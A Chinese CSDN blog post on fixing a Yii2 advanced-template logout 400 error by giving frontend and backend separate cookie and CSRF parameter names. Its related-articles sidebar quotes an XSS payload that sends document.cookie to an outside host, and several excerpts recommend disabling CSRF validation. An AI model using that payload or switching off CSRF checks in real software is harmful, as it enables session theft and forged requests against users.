yii2高级版,退出的时候报400错误。

最新推荐文章于 2023-01-14 14:37:51 发布
最新推荐文章于 2023-01-14 14:37:51 发布
阅读量544 收藏
点赞数
分类专栏: yii笔记 文章标签: yii 400错误
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31648761/article/details/72180708
版权

前后台分理离需要在各自的配置文件main.php中设置component的user组件中identityCookie参数和idParam参数,否则当管理员登录了前台的账号的时候,再登录后台,前台账号的会话信息会被覆盖。
前台frontend配置如下:

components=>[
    'user'=>[
        'identityClass' => 'frontend\models\User',
        'enableAutoLogin' => true,
        'identityCookie' => ['name' => '_identity-frontend', 'httpOnly' => true],
        'idParam'=>'_user',
    ]
]

后台backend配置如下:

components=>[
    'user'=>[
        'identityClass' => 'backend\models\Admin',
        'enableAutoLogin' => true,
        'identityCookie' => ['name' => '_identity-backend', 'httpOnly' => true],
        'idParam'=>'_admin',
    ]
]

解决退出报400错误的问题:
假设我们在同一个浏览器打开backend和frontend,打开浏览器控制台,yii2默认配置会有个cookie名为_csrf的cookie,我们刷新打开的frontend前台页面,发现它的值并没有改变,而当我们刷新后台backend的时候,此时名为_csrf的cookie的值就改变了。到这儿,相信我们就发现问题所在了。此时我们只需要配置下这个_csrf的名字就行了。打开前后台的配置文件,分别如下配置

components=>[
    'request'=>[
        'csrfParam'=>'_csrf_backend'
    ]
]
components=>[
    'request'=>[
        'csrfParam'=>'_csrf_frontend'
    ]
]

保存后删除当前网站的cookie,刷新页面。应该就能解决这个问题。

pengmingdong
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
使用yii2框架发送post请求400错误,关闭(开启)csrf的验证解决方案
徊忆羽菲
03-24 375
使用yii2框架发送post请求400错误,关闭开启csrf的验证解决方案全局使用csrf验证如果想在某些控制器不想使用csrf验证的话如果要具体关闭至某一个action如果局部开启csrf验证 全局使用csrf验证 我们直接在配置文件中设置enableCookieValidation为true request => [ 'enableCookieValidation' => true, ] 如果不需要使用csrf的话,设置’enableCookieValidation’ =&gt
提交表单400错误,提示 “您提交的数据无法验证”
aa545785的博客
10-07 2231
提交表单400错误,提示 “您提交的数据无法验证” 原来是csrf验证的问题,因为表单是自己写的,在Yii框架中,为了防止csrf攻击,对post的表单数据封装了CSRF令牌验证。 解决办法关闭csrf验证 frontend/config/main-local.php中 方法一、在配置文件中关闭 'components'=>array( 'request'=...
yii2出现的400错误
weixin_34389926的博客
03-02 275
来一段百度来的正常解决方法,注意有很大的坑! 第一种解决办法是关闭Csrf 1配置文件关闭 2控制器里面关闭 public function init(){ $this->enableCsrfValidation = false; } 第二种解决办法是在form表单中加入隐藏域 <input name="_csrf" type="hidde...
Yii2请求,400错误
aituochang1886的博客
09-24 142
出现400错误yii2.0的csrf防范策略导致 在components里面添加request配置如下: 'request' => [ // !!! insert a secret key in the following (if it is empty) - this is required by cookie validation 'cookieV...
转:YII2解决POST数据时因启用Csrf出现的400错误
一只烦恼的猪
02-10 249
很久没有写前端了,备注一下。 第一种解决办法是关闭Csrf public function init(){ $this->enableCsrfValidation = false; } 第二种解决办法是在form表单中加入隐藏域 <input name="_csrf" type="hidden" id="_csrf" value="<?= Yii::$app...
yii2 高级模板
05-08
在“yii2 高级模板”中,我们探讨的是Yii2框架的一个高级项目结构,它为大型复杂项目提供了一个良好的组织基础。这个模板不需要通过Composer安装,这意味着开发者可以直接下载并解压缩文件来开始开发,减少了初始化...
Yii 2.0进阶 高级组件 优化京东平台
04-25
2. **组件化编程**:学习如何在 Yii 2.0 中创建和使用组件,以及如何扩展内置组件以满足特定需求。 3. **数据库设计与 ORM**:掌握 Active Record 模式,理解如何定义数据模型,进行数据库操作。 4. **性能优化**:...
Yii2实现多域名跨域同步登录退出
10-20
本篇文章主要介绍了Yii2实现多域名跨域同步登录退出,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
yii2.0高级
10-22
11. **开发环境支持**:Yii 2.0 高级提供了一套完整的开发环境配置,包括自动加载、错误和异常处理、调试工具(如Debug Toolbar和Profiler)以及单元测试支持,便于开发者进行调试和测试。 12. **部署和优化**:...
详解Yii2高级引入bootstrap.js的一个办法
10-20
本篇文章主要介绍了详解Yii2高级引入bootstrap.js的一个办法,具有一定的参考价值,感兴趣的小伙伴们可以参考一下。
Yii框架退出登录
秋瑾的博客
04-06 856
Yii框架中,退出用户登录信息简单用即可 Yii::app−>user−>logout();returnapp->user->logout(); return this->redirect( [ ‘控制器 / 方法名’ ] );
yii框架提交form表单时400错误( Unable to verify your data submission.)几种解决方式
柚子哥哥i的博客
06-12 475
一、就是网络上最普遍的解决方式,将csrf关闭,这样就不会错了,关闭的方式有两种。 1.在配置文件advanced\frontend\config\main-local.php中进行修改配置"enableCsrfValidation"=false; 这种方法是针对于全局来解决的。 2. 就是在当前访问控制器下修改一个属性来修改配置, pub...
yii 文件上传400的错 YII2 Unable to verify your data submission 解决办法
浓汤
06-19 383
        我们在使用Yii2文件上传的时候可能会遇到400错,错内容是YII2 Unable to verify your data submission.其实这个是因为被CSRF验证拦截了,所以我们只要将其禁用了即可。第一种解决办法是关闭Csrfpublic function init(){ $this-&gt;enableCsrfValidation = false; } ...
yii2 后台前后台 前后台登陆、退出问题
yshir
05-21 315
问题描述: 我使用前后台分离 配置如下: 'user' => [ 'identityClass' => 'app\models\User', 'enableAutoLogin' => true, 'identityCookie' => ['name' => '__user_identity', 'httpOnly' => true], 'idParam' => '__user', 'logi
「网络安全渗透」如果你还不懂CSRF?这一篇让你彻底掌握
最新发布
yinjiyufei的博客
01-14 3227
「网络安全渗透」如果你还不懂CSRF?这一篇让你彻底掌握
Yii2.0 探究三 :用户登录机制
天下熙熙,皆为利来;天下攘攘,皆为利往。
12-22 1410
前言:做后台管理的首要任务当然是登陆、注册;登陆的重要性不言而喻,而yii框架为我们封装好了用户的验证方法,我们要做的就是模仿,接触别的框架的可能会有人问:我自己写一个验证登录啊,不就是查询数据库,对照字段吗?下面就做出解答: 一、为什么推荐你用自带的登陆? yii2.0框架为我们封装好了用户的信息(登录后才可以查看); 比如: \Yii::$app->user->isGust
XSS配合CSRF的利用 获取cookie
沐目的博客
07-11 1005
XSS的利用 获取cookie 今天主要学了下XSS的利用,昨天找漏洞,今天主要是利用漏洞。 主要就是围绕这句话展开的 <script>document.location=“http://cmumu.vip/flag.php?cookie=”+document.cookie</script> 1.首先找到XSS漏洞,然后让它可以执行这句话。 2.document.loca...
通俗易懂的csrf漏洞(token为什么能放cookie)
qq_39739740的博客
09-07 987
csrf漏洞即跨站请求伪造,通俗来说即攻击者通过发送第三方网站(乱七八糟的网站)给你,然而这个网站中隐藏了对你已经登陆过的网站的一些请求,也就是含有你的身份认证信息,从而可以假扮你去操作一些事情。假设微博的关注功能存在csrf漏洞那么这就表示给用户小明点了个关注。。注意:实际http请求中是携带了你cookie(即身份信息)的,总不能还没登陆微博就能点关注吧这时,如果有人给你发了一个恶意链接****这个网站里头有一个很吸引你的图或者什么话题,然而这个话题或图的链接。
有关cookie:验证_token、CSRF攻击、保存信息_cookie与本地存储、indexDB、
hhhh
04-28 1113
localStorage和sessionStorage都具有相同的操作方法,例如setItem、getItem和removeItem等 localStorage和sessionStorage的key和length属性实现遍历 IndexedDB 就是浏览器提供的本地数据库,它可以被网页脚本创建和操作。IndexedDB 允许储存大量数据,提供查找接口,还能建立索引。 var db = null; var request = window.indexedDB.open("MyTestDatabase"); r
Yii2框架学习与实战:从基础到高级
- 要创建一个基本Yii2项目,运行命令: ``` composer create-project --prefer-dist yiisoft/yii2-app-basic basic ``` - 对于高级项目,运行: ``` composer create-project --prefer-dist yiisoft/...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值